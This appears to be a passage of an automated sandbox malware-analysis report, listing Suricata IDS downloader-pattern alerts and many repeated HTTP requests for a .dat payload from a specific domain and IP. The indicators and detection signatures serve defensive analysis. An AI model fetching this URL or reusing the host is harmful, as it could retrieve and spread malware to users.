Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49701 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49702 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49703 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49707 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49719 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49706 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49713 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49734 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49741 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49748 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49743 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49759 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49765 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49776 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49753 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49781 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49727 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49787 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49808 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49771 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49819 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49792 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49813 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49824 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49802 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49840 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49856 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49829 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49851 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49861 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49867 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49888 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49894 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49899 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49882 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49833 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49910 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49876 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49845 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49904 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49924 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49936 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49915 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49940 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49954 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49960 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49975 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49872 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49965 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49930 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49944 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49980 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49969 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50006 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50022 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49996 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49796 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50043 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50046 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49949 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50057 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49986 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50062 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49990 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50085 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50041 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50089 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50027 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50001 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50081 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50017 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50052 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49919 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50084 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50045 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50056 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50047 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50091 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50094 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50065 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50100 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50099 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50083 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50049 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50086 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50096 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50095 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50039 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50051 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50067 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50054 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50059 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50053 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50093 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50012 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50038 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50097 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50032 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50055 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50063 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50060 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50061 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50042 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50070 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50082 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50058 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50076 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50048 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50087 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50044 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50092 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50088 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50098 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50040 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50090 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50050 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50079 -> 185.181.116.217:443
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
